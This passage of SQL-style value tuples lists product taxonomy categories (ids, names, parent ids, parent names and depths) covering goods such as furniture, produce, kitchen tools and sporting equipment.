(6281,'Medical Forceps',230913,'Medical Instruments',3),
(6282,'Eyelash Curler Refills',2548,'Makeup Tools',5),
(6284,'Blood Pressure Monitor Accessories',5071,'Biometric Monitor Accessories',3),
(6285,'Blood Pressure Monitor Cuffs',6284,'Blood Pressure Monitor Accessories',4),
(6286,'Skimboards',1143,'Surfing',4),
(6287,'Bodyboards',1143,'Surfing',4),
(6288,'Paddleboards',1143,'Surfing',4),
(6289,'UPS Batteries',276,'Batteries',4),
(6290,'Baby Health & Grooming Kits',5252,'Baby Health',2),
(6291,'Keyboard & Mouse Wrist Rests',279,'Computer Accessories',3),
(6292,'Power Tool Chargers',3650,'Tool Accessories',2),
(6293,'Watercraft Lighting',3391,'Watercraft Parts & Accessories',3),
(6295,'Power Tool Batteries',3650,'Tool Accessories',2),
(6296,'Water Ski Cases & Bags',1146,'Water Skiing',5),
(6297,'Tie Down Straps',502977,'Chain, Wire & Rope',3),
(6298,'Bungee Cords',502977,'Chain, Wire & Rope',3),
(6300,'Manicure Tool Sets',2975,'Nail Tools',5),
(6301,'Towable Rafts & Tubes',3195,'Towed Water Sports',4),
(6302,'Water Ski Bindings',1146,'Water Skiing',5),
(6303,'Medical Bedding',2496,'Medical',2),
(6304,'Highlighters & Luminizers',2571,'Face Makeup',5),
(6305,'Blushes & Bronzers',2571,'Face Makeup',5),
(6306,'Lip & Cheek Stains',2645,'Lip Makeup',5),
(6307,'Underwater Camera Housings',143,'Camera Parts & Accessories',3),
(6308,'Camera Bags & Cases',143,'Camera Parts & Accessories',3),
(6311,'Balloon Kits',96,'Party Supplies',3),
(6312,'Kayak Accessories',1120,'Boating & Rafting',4),
(6314,'Canoe Accessories',1120,'Boating & Rafting',4),
(6317,'Decorative Bottles',696,'Decor',2),
(6318,'Watering Cans',3568,'Watering & Irrigation',3),
(6319,'Brass Fasteners',932,'General Office Supplies',2),
(6321,'Pet Containment Systems',2,'Pet Supplies',2),
(6322,'Table Skirts',601,'Table Linens',3),
(6323,'Blood Glucose Control Solution',3688,'Blood Glucose Meter Accessories',4),
(6324,'Napkin Rings',696,'Decor',2),
(6325,'Table Runners',601,'Table Linens',3),
(6328,'Pressure Washer Accessories',4564,'Outdoor Power Equipment Accessories',3),
(6329,'Battle Tops',3793,'Games',2),
(6330,'Swim Goggle & Mask Accessories',1144,'Swimming',4),
(6331,'Cosmetic Tool Cleansers',473,'Cosmetics',3),
(6333,'Mailbox Accessories',696,'Decor',2),
(6334,'Mailbox Posts',6333,'Mailbox Accessories',3),
(6336,'Candle & Oil Warmers',500121,'Home Fragrance Accessories',3),
(6337,'Foam Roller Accessories',990,'Exercise & Fitness',2),
(6338,'Foam Roller Storage Bags',6337,'Foam Roller Accessories',3),
(6340,'Lash & Brow Growth Treatments',2779,'Eye Makeup',5),
(6341,'Nail Buffers',2975,'Nail Tools',5),
(6342,'Cookie Presses',668,'Kitchen Tools & Utensils',3),
(6343,'Door Hardware',115,'Building Materials',2),
(6344,'Stadium Seats & Cushions',499799,'General Purpose Athletic Equipment',3),
(6345,'Furniture Sets',436,'Furniture',1),
(6346,'Bedroom Furniture Sets',6345,'Furniture Sets',2),
(6347,'Kitchen & Dining Furniture Sets',6345,'Furniture Sets',2),
(6348,'Living Room Furniture Sets',6345,'Furniture Sets',2),
(6349,'Baby & Toddler Furniture Sets',554,'Baby & Toddler Furniture',2),
(6351,'Activity Tables',6392,'Tables',2),
(6356,'Cabinets & Storage',436,'Furniture',1),
(6357,'Wine & Liquor Cabinets',6356,'Cabinets & Storage',2),
(6358,'Media Storage Cabinets & Racks',6356,'Cabinets & Storage',2),
(6360,'Bedroom Vanities',4148,'Vanities',3),
(6362,'Office Furniture',436,'Furniture',1),
(6363,'Workspace Tables',6362,'Office Furniture',2),
(6367,'Outdoor Furniture Sets',4299,'Outdoor Furniture',2),
(6368,'Outdoor Seating',4299,'Outdoor Furniture',2),
(6369,'Accent Tables',6392,'Tables',2),
(6372,'Wall Shelves & Ledges',464,'Shelving',2),
(6373,'Office Carts',922,'Office Supplies',1),
(6374,'Kitchen Islands',442,'Carts & Islands',2),
(6375,'Extension Cord Accessories',127,'Power & Electrical Supplies',2),
(6378,'Drill Bit Sharpeners',3944,'Drill & Screwdriver Accessories',3),
(6379,'Wagons',2799,'Riding Toys',3),
(6381,'Landscape Fabric',2962,'Gardening',3),
(6382,'Fabric Repair Kits',505370,'Art & Craft Kits',4),
(6383,'Pet Grooming Supplies',2,'Pet Supplies',2),
(6384,'Pet Hair Clippers & Trimmers',6383,'Pet Grooming Supplies',3),
(6385,'Pet Combs & Brushes',6383,'Pet Grooming Supplies',3),
(6386,'Horse Clippers & Trimmers',5025,'Horse Grooming',5),
(6387,'Fabric Starch',627,'Laundry Supplies',3),
(6388,'Slotted Spoons',668,'Kitchen Tools & Utensils',3),
(6392,'Tables',436,'Furniture',1),
(6393,'Bassinets & Cradles',554,'Baby & Toddler Furniture',2),
(6394,'Cribs & Toddler Beds',554,'Baby & Toddler Furniture',2),
(6396,'Inflatable Bouncers',1249,'Outdoor Play Equipment',2),
(6397,'Play Tents & Tunnels',1249,'Outdoor Play Equipment',2),
(6402,'Cable Trays',3328,'Cable Management',3),
(6403,'Fish Feeders',6,'Fish Supplies',3),
(6404,'Time & Attendance Clocks',950,'Office Equipment',2),
(6406,'Pet Shampoo & Conditioner',6383,'Pet Grooming Supplies',3),
(6407,'Hobby Horses',2799,'Riding Toys',3),
(6408,'Cake Servers',668,'Kitchen Tools & Utensils',3),
(6411,'Electric Knife Accessories',668,'Kitchen Tools & Utensils',3),
(6412,'Electric Knife Replacement Blades',6411,'Electric Knife Accessories',4),
(6413,'Landscape Fabric Accessories',2962,'Gardening',3),
(6415,'Sugar Caddies',2948,'Kitchen Organizers',4),
(6416,'Laptop Hinges',4224,'Laptop Parts',4),
(6418,'Fusible Tape',505376,'Crafting Adhesives & Magnets',5),
(6419,'Fabric & Upholstery Protectors',623,'Household Cleaning Supplies',3),
(6421,'Landscape Fabric Tape',6413,'Landscape Fabric Accessories',4),
(6422,'Landscape Fabric Staples & Pins',6413,'Landscape Fabric Accessories',4),
(6424,'Vase Fillers & Table Scatters',696,'Decor',2),
(6425,'Serveware Accessories',672,'Tableware',3),
(6426,'Tureen Stands',6425,'Serveware Accessories',4),
(6427,'Tureen Lids',6425,'Serveware Accessories',4),
(6428,'Plant Stands',2962,'Gardening',3),
(6429,'Hair Steamers & Heat Caps',486,'Hair Care',3),
(6433,'Beds & Accessories',436,'Furniture',1),
(6434,'Punch Bowl Stands',6425,'Serveware Accessories',4),
(6436,'Composters',4085,'Composting',4),
(6437,'Buckets',623,'Household Cleaning Supplies',3),
(6439,'Chopstick Accessories',675,'Flatware',4),
(6440,'Fishing Yarn',7217,'Fly Tying Materials',4),
(6441,'Tongue Scrapers',526,'Oral Care',3),
(6442,'Bicycle Covers',3214,'Bicycle Accessories',4),
(6445,'Bicycle Saddle Pads & Seat Covers',3214,'Bicycle Accessories',4),
(6446,'Door Closers',6343,'Door Hardware',3),
(6447,'Thread & Yarn Cutters',504640,'Craft Cutting & Embossing Tools',5),
(6449,'Wine Carrier Bags',2920,'Food & Beverage Carriers',3),
(6450,'See Saws',1249,'Outdoor Play Equipment',2),
(6452,'Free Weight Accessories',499793,'Weight Lifting',3),
(6454,'Motor Vehicle Carrying Rack Accessories',8237,'Vehicle Storage & Cargo',3),
(6455,'Dental Water Jet Replacement Tips',526,'Oral Care',3),
(6456,'Decorative Trays',696,'Decor',2),
(6457,'Decorative Bowls',696,'Decor',2),
(6458,'Door Strikes',6343,'Door Hardware',3),
(6459,'Electrical Switches',127,'Power & Electrical Supplies',2),
(6460,'Checkbook Covers',6552,'Handbag & Wallet Accessories',2),
(6461,'Electrician Fish Tape',1167,'Tools',2),
(6462,'Anti',6519,'Office & Chair Mats',2),
(6463,'Jewelry Sets',188,'Jewelry',2),
(6464,'Water Play Equipment',1249,'Outdoor Play Equipment',2),
(6465,'Play Sprinkers',6464,'Water Play Equipment',3),
(6466,'Toy Abacuses',1262,'Educational Toys',3),
(6467,'Hole Punches',2014,'Paper Handling',2),
(6471,'Driver Accessories',3650,'Tool Accessories',2),
(6473,'Hand Paddles',1144,'Swimming',4),
(6474,'Household Disinfectants',4973,'Household Cleaning Products',4),
(6475,'Input Device Accessories',285,'Computer Components',3),
(6476,'Barcode Scanner Stands',6475,'Input Device Accessories',4),
(6478,'Food Storage Accessories',638,'Kitchen & Dining',2),
(6479,'Oxygen Absorbers',6478,'Food Storage Accessories',3),
(6480,'Can Organizers',2948,'Kitchen Organizers',4),
(6481,'Food Container Covers',2626,'Food Storage',3),
(6482,'Vehicle Diagnostic Scanners',8236,'Vehicle Repair & Specialty Tools',4),
(6486,'Fingertip Grips',2014,'Paper Handling',2),
(6487,'Kitchen Cabinet Organizers',2948,'Kitchen Organizers',4),
(6488,'Key Blanks',1974,'Locks & Keys',2),
(6490,'Medical Teaching Equipment',2496,'Medical',2),
(6491,'Medical & Emergency Response Training Mannequins',6490,'Medical Teaching Equipment',3),
(6492,'Stained Glass Panels',603,'Window Treatments',3),
(6493,'Motorcycle Helmet Parts & Accessories',5547,'Motorcycle Protective Gear',4),
(6495,'Fishing Bait & Chum Containers',3334,'Fishing',3),
(6496,'Life Jacket Accessories',499813,'Boating & Water Sport Apparel',4),
(6497,'Salad Dressing Mixers & Shakers',668,'Kitchen Tools & Utensils',3),
(6499,'Arm Chairs, Recliners & Sleeper Chairs',443,'Chairs',2),
(6501,'Table Saw Accessories',6549,'Saw Accessories',3),
(6503,'Miter Saw Accessories',6549,'Saw Accessories',3),
(6506,'Bicycle Shock Pumps',3214,'Bicycle Accessories',4),
(6508,'Power Over Ethernet Adapters',342,'Networking',2),
(6509,'Contact Lens Solution',3011,'Contact Lens Care',4),
(6510,'Contact Lens Cases',3011,'Contact Lens Care',4),
(6511,'Swimming Fins',1144,'Swimming',4),
(6512,'Monofins',6511,'Swimming Fins',5),
(6513,'Swim Belts',1144,'Swimming',4),
(6514,'Diving Belts',1135,'Diving & Snorkeling',4),
(6515,'Swimming Nose Clips',1144,'Swimming',4),
(6516,'Pretzel Makers',5289,'Toasters & Grills',4),
(6517,'Hot Dog Rollers',135,'Food Service',2),
(6518,'Fermentation & Pickling Crocks',654,'Cookware',4),
(6519,'Office & Chair Mats',922,'Office Supplies',1),
(6520,'Office Mats',6519,'Office & Chair Mats',2),
(6521,'Chair Mats',6519,'Office & Chair Mats',2),
(6522,'Channel Knives',668,'Kitchen Tools & Utensils',3),
(6523,'Thermal Cookers',4532,'Food Cookers & Steamers',4),
(6524,'Gas Griddles',730,'Kitchen Appliances',3),
(6526,'Oil & Vinegar Dispensers',668,'Kitchen Tools & Utensils',3),
(6530,'Window Magnets',696,'Decor',2),
(6531,'Nativity Sets',596,'Seasonal & Holiday Decorations',3),
(6532,'Holiday Ornament Displays & Stands',596,'Seasonal & Holiday Decorations',3),
(6534,'Candy Buckets',2626,'Food Storage',3),
(6535,'Snow Globes',696,'Decor',2),
(6536,'Pole Dancing Kits',773,'Erotic',2),
(6539,'Magazine Racks',6356,'Cabinets & Storage',2),
(6540,'Jewelry & Beading Cord',505382,'Crafting Fibers',5),
(6541,'Lawn Sweepers',4566,'Lawn Mower Accessories',4),
(6542,'Brush Mower Attachments',4566,'Lawn Mower Accessories',4),
(6543,'Hot Drink Makers',730,'Kitchen Appliances',3),
(6544,'GPS Tracking Devices',222,'Electronics',1),
(6545,'Channel Strips',2165,'Audio Components',3),
(6546,'Direct Boxes',2165,'Audio Components',3),
(6547,'Lawn Ornaments & Garden Sculptures',696,'Decor',2),
(6548,'Chafing Dishes',5103,'Food Warmers',4),
(6549,'Saw Accessories',3650,'Tool Accessories',2),
(6550,'Swim Weights',1144,'Swimming',4),
(6551,'Handbags, Wallets & Cases',166,'Apparel & Accessories',1),
(6552,'Handbag & Wallet Accessories',166,'Apparel & Accessories',1),
(6553,'Train Cases',5181,'Luggage & Bags',1),
(6554,'Food Sticks & Skewers',668,'Kitchen Tools & Utensils',3),
(6555,'Eyebrow Stencils',2548,'Makeup Tools',5),
(6556,'Paint Edgers',2077,'Paint Tools',3),
(6557,'Paint Trays',2077,'Paint Tools',3),
(6558,'Paint Mediums',505378,'Craft Paint, Ink & Glaze',5),
(6559,'Ear Drops',506,'Ear Care',3),
(6560,'Ear Dryers',506,'Ear Care',3),
(6561,'Ear Syringes',506,'Ear Care',3),
(6562,'Ear Wax Removal Kits',506,'Ear Care',3),
(6563,'Fireplace & Wood Stove Grates',2862,'Fireplace & Wood Stove Accessories',2),
(6566,'Apples',5795,'Fresh & Frozen Fruits',4),
(6567,'Apricots',503760,'Stone Fruits',5),
(6568,'Asparagus',5793,'Fresh & Frozen Vegetables',4),
(6569,'Arugula',6622,'Greens',5),
(6570,'Artichokes',5793,'Fresh & Frozen Vegetables',4),
(6571,'Atemoyas',5795,'Fresh & Frozen Fruits',4),
(6572,'Avocados',5795,'Fresh & Frozen Fruits',4),
(6573,'Babacos',5795,'Fresh & Frozen Fruits',4),
(6574,'Bananas',5795,'Fresh & Frozen Fruits',4),
(6577,'Beans',5793,'Fresh & Frozen Vegetables',4),
(6580,'Beets',5793,'Fresh & Frozen Vegetables',4),
(6581,'Beet Greens',6622,'Greens',5),
(6582,'Berries',5795,'Fresh & Frozen Fruits',4),
(6584,'Bok Choy',6622,'Greens',5),
(6585,'Sweet Potatoes',5793,'Fresh & Frozen Vegetables',4),
(6586,'Potatoes',5793,'Fresh & Frozen Vegetables',4),
(6587,'Borage',5793,'Fresh & Frozen Vegetables',4),
(6589,'Breadfruit',5795,'Fresh & Frozen Fruits',4),
(6590,'Brussel Sprouts',5793,'Fresh & Frozen Vegetables',4),
(6591,'Broccoli',5793,'Fresh & Frozen Vegetables',4),
(6592,'Cabbage',5793,'Fresh & Frozen Vegetables',4),
(6593,'Cactus Pears',5795,'Fresh & Frozen Fruits',4),
(6594,'Starfruits',5795,'Fresh & Frozen Fruits',4),
(6595,'Carrots',5793,'Fresh & Frozen Vegetables',4),
(6596,'Cardoon',5793,'Fresh & Frozen Vegetables',4),
(6597,'Chard',6622,'Greens',5),
(6598,'Celery Roots',5793,'Fresh & Frozen Vegetables',4),
(6599,'Celery',5793,'Fresh & Frozen Vegetables',4),
(6600,'Cauliflower',5793,'Fresh & Frozen Vegetables',4),
(6601,'Cherries',503760,'Stone Fruits',5),
(6602,'Cherimoyas',5795,'Fresh & Frozen Fruits',4),
(6603,'Christmas Tree Stands',596,'Seasonal & Holiday Decorations',3),
(6608,'Cucumbers',5793,'Fresh & Frozen Vegetables',4),
(6609,'Corn',5793,'Fresh & Frozen Vegetables',4),
(6610,'Choy Sum',6622,'Greens',5),
(6613,'Eggplants',5793,'Fresh & Frozen Vegetables',4),
(6614,'Feijoas',5795,'Fresh & Frozen Fruits',4),
(6615,'Fiddlehead Ferns',5793,'Fresh & Frozen Vegetables',4),
(6616,'Gai Choy',5793,'Fresh & Frozen Vegetables',4),
(6617,'Gai Lan',5793,'Fresh & Frozen Vegetables',4),
(6618,'Gobo Root',5793,'Fresh & Frozen Vegetables',4),
(6619,'Ginger Root',5793,'Fresh & Frozen Vegetables',4),
(6620,'Garlic',5793,'Fresh & Frozen Vegetables',4),
(6621,'Grapefruits',503759,'Citrus Fruits',5),
(6622,'Greens',5793,'Fresh & Frozen Vegetables',4),
(6624,'Homely Fruits',5795,'Fresh & Frozen Fruits',4),
(6625,'Guavas',5795,'Fresh & Frozen Fruits',4),
(6626,'Grapes',5795,'Fresh & Frozen Fruits',4),
(6627,'Leeks',5793,'Fresh & Frozen Vegetables',4),
(6628,'Kohlrabi',5793,'Fresh & Frozen Vegetables',4),
(6629,'Kale',6622,'Greens',5),
(6630,'Jicama',5793,'Fresh & Frozen Vegetables',4),
(6631,'Horseradish Root',5793,'Fresh & Frozen Vegetables',4),
(6632,'Kumquats',503759,'Citrus Fruits',5),
(6633,'Kiwis',5795,'Fresh & Frozen Fruits',4),
(6636,'Lemons',503759,'Citrus Fruits',5),
(6637,'Lettuce',6622,'Greens',5),
(6638,'Lychees',5795,'Fresh & Frozen Fruits',4),
(6639,'Loquats',5795,'Fresh & Frozen Fruits',4),
(6640,'Longan',5795,'Fresh & Frozen Fruits',4),
(6641,'Limequats',503759,'Citrus Fruits',5),
(6642,'Limes',503759,'Citrus Fruits',5),
(6643,'Malangas',5793,'Fresh & Frozen Vegetables',4),
(6644,'Lotus Roots',5793,'Fresh & Frozen Vegetables',4),
(6645,'Mangosteens',5795,'Fresh & Frozen Fruits',4),
(6646,'Mangoes',503760,'Stone Fruits',5),
(6647,'Mamey',5795,'Fresh & Frozen Fruits',4),
(6649,'Melons',5795,'Fresh & Frozen Fruits',4),
(6653,'Mushrooms',5793,'Fresh & Frozen Vegetables',4),
(6655,'Onions',5793,'Fresh & Frozen Vegetables',4),
(6656,'On Choy',6622,'Greens',5),
(6657,'Okra',5793,'Fresh & Frozen Vegetables',4),
(6658,'Oranges',503759,'Citrus Fruits',5),
(6661,'Papayas',5795,'Fresh & Frozen Fruits',4),
(6663,'Parsnips',5793,'Fresh & Frozen Vegetables',4),
(6664,'Parsley Roots',5793,'Fresh & Frozen Vegetables',4),
(6665,'Pears',5795,'Fresh & Frozen Fruits',4),
(6667,'Passion Fruit',5795,'Fresh & Frozen Fruits',4),
(6668,'Peppers',5793,'Fresh & Frozen Vegetables',4),
(6669,'Peas',5793,'Fresh & Frozen Vegetables',4),
(6670,'Pineapples',5795,'Fresh & Frozen Fruits',4),
(6671,'Physalis',5795,'Fresh & Frozen Fruits',4),
(6672,'Persimmons',5795,'Fresh & Frozen Fruits',4),
(6673,'Pomegranates',5795,'Fresh & Frozen Fruits',4),
(6674,'Plums',503760,'Stone Fruits',5),
(6675,'Plumcots',503760,'Stone Fruits',5),
(6676,'Pitahayas',5795,'Fresh & Frozen Fruits',4),
(6678,'Rambutans',5795,'Fresh & Frozen Fruits',4),
(6679,'Quince',5795,'Fresh & Frozen Fruits',4),
(6681,'Rhubarb',5793,'Fresh & Frozen Vegetables',4),
(6682,'Radishes',5793,'Fresh & Frozen Vegetables',4),
(6687,'Sapote',5795,'Fresh & Frozen Fruits',4),
(6688,'Sapodillo',5795,'Fresh & Frozen Fruits',4),
(6691,'Soursops',5795,'Fresh & Frozen Fruits',4),
(6692,'Tamarillos',5793,'Fresh & Frozen Vegetables',4),
(6693,'Sunchokes',5793,'Fresh & Frozen Vegetables',4),
(6694,'Sugar Cane',5793,'Fresh & Frozen Vegetables',4),
(6695,'Spinach',6622,'Greens',5),
(6697,'Tangelos',503759,'Citrus Fruits',5),
(6698,'Tamarindo',5795,'Fresh & Frozen Fruits',4),
(6700,'Watercress',5793,'Fresh & Frozen Vegetables',4),
(6701,'Water Chestnuts',5793,'Fresh & Frozen Vegetables',4),
(6703,'Tomatoes',5793,'Fresh & Frozen Vegetables',4),
(6704,'Taro Root',5793,'Fresh & Frozen Vegetables',4),
(6705,'Yuca Root',5793,'Fresh & Frozen Vegetables',4),
(6706,'Yu Choy',6622,'Greens',5),
(6708,'Figure Skate Boots',3791,'Ice Skate Parts & Accessories',4),
(6709,'Outdoor Misting Systems',1626,'Climate Control Appliances',3),
(6712,'Tissue Paper',94,'Gift Wrapping',4),
(6714,'Vital Signs Monitor Accessories',3477,'Medical Equipment',3),
(6715,'Power Flossers',526,'Oral Care',3),
(6716,'Arracachas',5793,'Fresh & Frozen Vegetables',4),
(6717,'Chicory',6622,'Greens',5),
(6721,'Tin Whistles',87,'Woodwinds',4),
(6723,'Dough Wheels',668,'Kitchen Tools & Utensils',3),
(6725,'Wooden & Pegged Puzzles',3867,'Puzzles',2),
(6726,'Waste Container Enclosures',6757,'Waste Containment Accessories',3),
(6727,'Evaporative Coolers',1626,'Climate Control Appliances',3),
(6728,'Train Whistles',87,'Woodwinds',4),
(6729,'Penalty Cards & Flags',6739,'Coaching & Officiating',3),
(6730,'Sport & Safety Whistles',6739,'Coaching & Officiating',3),
(6731,'Linesman Flags',6739,'Coaching & Officiating',3),
(6732,'Gaskets & O',1810,'Plumbing Fittings & Supports',3),
(6734,'Broomball Equipment',499713,'Athletics',2),
(6737,'Hammock Parts & Accessories',2918,'Outdoor Living',3),
(6739,'Coaching & Officiating',499713,'Athletics',2),
(6740,'Coffee & Tea Sets',672,'Tableware',3),
(6741,'Garage Door Keypads & Remotes',604,'Household Appliances',2),
(6743,'Yoga & Pilates Towels',999,'Yoga & Pilates',3),
(6744,'Motor Vehicle Cargo Nets',8237,'Vehicle Storage & Cargo',3),
(6746,'Sink Caddies',668,'Kitchen Tools & Utensils',3),
(6747,'Garbage Disposal Accessories',2901,'Kitchen Appliance Accessories',3),
(6748,'Paintball Grenade Launchers',1049,'Paintball',5),
(6749,'Pasta Molds & Stamps',668,'Kitchen Tools & Utensils',3),
(6750,'Yoga & Pilates Blocks',999,'Yoga & Pilates',3),
(6751,'Outdoor Umbrella & Sunshade Accessories',2918,'Outdoor Living',3),
(6753,'Petroleum Jelly',567,'Skin Care',4),
(6754,'Baking Chips',2660,'Cooking & Baking Ingredients',3),
(6756,'Broiling Pans',640,'Bakeware',4),
(6757,'Waste Containment Accessories',630,'Household Supplies',2),
(6758,'Waste Container Wheels',6757,'Waste Containment Accessories',3),
(6760,'Facial Saunas',2958,'Skin Care Tools',5),
(6761,'Hard Cider',499676,'Alcoholic Beverages',3),
(6762,'Indoor & Outdoor Plants',985,'Plants',2),
(6763,'Fountains & Waterfalls',702,'Fountains & Ponds',3),
(6764,'Protective Aprons',2047,'Work Safety Protective Gear',2),
(6765,'Waste Container Carts',6757,'Waste Containment Accessories',3),
(6766,'Pool Ladders, Steps & Ramps',2832,'Pool & Spa Accessories',3),
(6767,'Wax Tarts',592,'Home Fragrances',3),
(6769,'Pneumatic Hoses',2878,'Hardware Accessories',2),
(6770,'Lubrication Hoses',2878,'Hardware Accessories',2),
(6771,'Pool Cleaner Hoses',2832,'Pool & Spa Accessories',3),
(6772,'Cocktail Sauce',427,'Condiments & Sauces',3),
(6773,'Furnace & Boiler Accessories',3348,'Household Appliance Accessories',2),
(6774,'Batter & Coating Mixes',2660,'Cooking & Baking Ingredients',3),
(6775,'Edible Baking Decorations',2660,'Cooking & Baking Ingredients',3),
(6779,'Recipe Card Boxes',923,'Filing & Organization',2),
(6780,'Wire & Cable Sleeves',3328,'Cable Management',3),
(6781,'Paintball Harnesses & Packs',1049,'Paintball',5),
(6782,'Horseradish Sauce',427,'Condiments & Sauces',3),
(6783,'Tartar Sauce',427,'Condiments & Sauces',3),
(6784,'Tapenade',5740,'Dips & Spreads',3),
(6785,'Snack Cakes',423,'Snack Foods',3),
(6786,'Food Washers & Dryers',135,'Food Service',2),
(6787,'Gelatin Molds',668,'Kitchen Tools & Utensils',3),
(6788,'Robotic Mowers',694,'Lawn Mowers',4),
(6789,'Lawn Vacuums',3798,'Outdoor Power Equipment',3),
(6790,'Power Control Units',275,'Power',3),
(6791,'Facial Pore Strips',567,'Skin Care',4),
(6792,'Fireplaces',536,'Home & Garden',1),
(6794,'Battle Top Accessories',3793,'Games',2),
(6795,'Ammonia',2277,'Chemicals',3),
(6797,'Buttermilk',413,'Beverages',2),
(6799,'Thermal Imaging Cameras',1305,'Measuring Tools & Sensors',3),
(6800,'Gaming Chairs',443,'Chairs',2),
(6806,'Hole Saws',3944,'Drill & Screwdriver Accessories',3),
(6807,'Circuit Breaker Panels',127,'Power & Electrical Supplies',2),
(6808,'Cactus Leaves',5793,'Fresh & Frozen Vegetables',4),
(6809,'Coconuts',5795,'Fresh & Frozen Fruits',4),
(6810,'Figs',5795,'Fresh & Frozen Fruits',4),
(6811,'Pet Apparel Hangers',2,'Pet Supplies',2),
(6812,'Dates',5795,'Fresh & Frozen Fruits',4),
(6813,'MadroÃ±o',5795,'Fresh & Frozen Fruits',4),
(6814,'Sugar Apples',5795,'Fresh & Frozen Fruits',4),
(6816,'Fennel Bulbs',5793,'Fresh & Frozen Vegetables',4),
(6817,'Battery Charge Controllers',7166,'Battery Accessories',4),
(6818,'Shallots',5793,'Fresh & Frozen Vegetables',4),
(6819,'Donut Makers',5289,'Toasters & Grills',4),
(6821,'Whipped Cream',428,'Dairy Products',3),
(6822,'Outdoor Ottomans',4299,'Outdoor Furniture',2),
(6828,'Outdoor Chairs',6368,'Outdoor Seating',3),
(6829,'Mosaic Kits',505370,'Art & Craft Kits',4),
(6830,'Vegetable Dip',5740,'Dips & Spreads',3),
(6831,'Cheese Dips & Spreads',5740,'Dips & Spreads',3),
(6832,'Water Timers',133,'Plumbing',2),
(6833,'Wall Socket Controls & Sensors',127,'Power & Electrical Supplies',2),
(6834,'Rain Barrels',2962,'Gardening',3),
(6838,'CrÃªpe & Blini Pans',654,'Cookware',4),
(6839,'Cheese Alternatives',5807,'Tofu, Soy & Vegetarian Products',3),
(6840,'Compost Aerators',4085,'Composting',4),
(6841,'Gas Hoses',2878,'Hardware Accessories',2),
(6842,'Hair Clipper & Trimmer Accessories',528,'Shaving & Grooming',3),
(6843,'Meat Alternatives',5807,'Tofu, Soy & Vegetarian Products',3),
(6844,'Ice Cream Syrup',6845,'Dessert Toppings',4),
(6845,'Dessert Toppings',427,'Condiments & Sauces',3),
(6846,'Pet Training Pads',505314,'Pet Training Aids',3),
(6847,'Salad Toppings',423,'Snack Foods',3),
(6848,'Powdered Beverage Mixes',413,'Beverages',2),
(6850,'Kitchen & Dining Benches',441,'Benches',2),
(6851,'Storage & Entryway Benches',441,'Benches',2),
(6852,'Hockey Stick Blades',7011,'Hockey Stick Parts',4),
(6853,'Card Game Accessories',3793,'Games',2),
(6854,'Fruit Toppings',6845,'Dessert Toppings',4),
(6857,'Hockey Sledges',499915,'Figure Skating & Hockey',3),
(6858,'Bathroom Accessory Sets',574,'Bathroom Accessories',2),
(6859,'Slipper Chairs',443,'Chairs',2),
(6860,'Futon Frames',436,'Furniture',1),
(6861,'Pet Medical Tape & Bandages',2,'Pet Supplies',2),
(6862,'Feminine Deodorant',485,'Feminine Sanitary Supplies',3),
(6863,'Wart Removers',567,'Skin Care',4),
(6864,'Golf Ball Markers',1043,'Golf',3),
(6865,'3D Printers',345,'Print, Copy, Scan & Fax',2),
(6867,'Hand Exercisers',990,'Exercise & Fitness',2),
(6868,'Planers',1167,'Tools',2),
(6869,'Baby & Pet Gate Accessories',540,'Baby Safety',2),
(6870,'Watch Winders',5122,'Watch Accessories',3),
(6871,'Nutritional Food PurÃ©es',2890,'Fitness & Nutrition',3),
(6873,'Ice Cream Novelties',5788,'Frozen Desserts & Novelties',3),
(6876,'Tool Bags',3974,'Tool Storage & Organization',3),
(6878,'Humidors',600,'Smoking Accessories',2),
(6879,'Cigar Cutters & Punches',600,'Smoking Accessories',2),
(6880,'Humidor Accessories',600,'Smoking Accessories',2),
(6881,'Cigarette Cases',600,'Smoking Accessories',2),
(6882,'Cigar Cases',600,'Smoking Accessories',2),
(6883,'Diaper Organizers',548,'Diapering',2),
(6884,'Folders & Report Covers',923,'Filing & Organization',2),
(6885,'Portfolios & Padfolios',923,'Filing & Organization',2),
(6886,'Radios',242,'Audio Players & Recorders',3),
(6887,'Airbrush Accessories',7019,'Paint Tool Accessories',3),
(6888,'Coffee Decanter Warmers',3988,'Coffee Maker & Espresso Machine Accessories',4),
(6891,'Taco Shells & Tostadas',1876,'Bakery',3),
(6892,'Outdoor Beds',4299,'Outdoor Furniture',2),
(6893,'Manicure Glue',478,'Nail Care',4),
(6897,'Emergency Blankets',5835,'Emergency Preparedness',2),
(6898,'Horse Blankets & Sheets',3257,'Horse Care',4),
(6899,'Swaddling & Receiving Blankets',537,'Baby & Toddler',1),
(6904,'Utility Wire',502977,'Chain, Wire & Rope',3),
(6905,'Curry Sauce',427,'Condiments & Sauces',3),
(6906,'Party Hats',96,'Party Supplies',3),
(6907,'Jigs',3650,'Tool Accessories',2),
(6908,'Workstations & Cubicles',6362,'Office Furniture',2),
(6909,'Workstation & Cubicle Accessories',503765,'Office Furniture Accessories',2),
(6910,'Table Tops',6913,'Table Accessories',2),
(6911,'Table Legs',6913,'Table Accessories',2),
(6912,'Desk & Shelf Clocks',3890,'Clocks',3),
(6913,'Table Accessories',436,'Furniture',1),
(6914,'Riding Pants',5594,'Riding Apparel & Accessories',4),
(6915,'Room Divider Accessories',436,'Furniture',1),
(6919,'Travel Bottles & Containers',110,'Luggage Accessories',2),
(6920,'Toothbrush Covers',4775,'Toothbrush Accessories',4),
(6921,'Spray Tanning Tents',2915,'Personal Care',2),
(6922,'Tomato Paste',2660,'Cooking & Baking Ingredients',3),
(6927,'Ottoman Cushions',696,'Decor',2),
(6928,'Ladders',130,'Ladders & Scaffolding',3),
(6929,'Walking Aid Accessories',519,'Mobility & Accessibility',3),
(6930,'Checks',956,'Paper Products',3),
(6932,'Blade Server Enclosures',285,'Computer Components',3),
(6933,'Power Adapter & Charger Accessories',275,'Power',3),
(6934,'Kitchen Cabinets',6356,'Cabinets & Storage',2),
(6935,'Ecospheres',696,'Decor',2),
(6936,'Dried Flowers',696,'Decor',2),
(6938,'Abrasive Blasters',1167,'Tools',2),
(6939,'Abrasive Blaster Accessories',3650,'Tool Accessories',2),
(6940,'Sandblasting Cabinets',6939,'Abrasive Blaster Accessories',3),
(6942,'Hockey Stick Shafts',7011,'Hockey Stick Parts',4),
(6943,'Shutters',115,'Building Materials',2),
(6944,'Fondue Set Accessories',2901,'Kitchen Appliance Accessories',3),
(6945,'Fondue Forks',6944,'Fondue Set Accessories',4),
(6946,'Fondue Pot Stands',6944,'Fondue Set Accessories',4),
(6947,'Hope Chests',4205,'Storage Chests',3),
(6949,'Diaper Liners',548,'Diapering',2),
(6950,'Sippy Cups',561,'Nursing & Feeding',2),
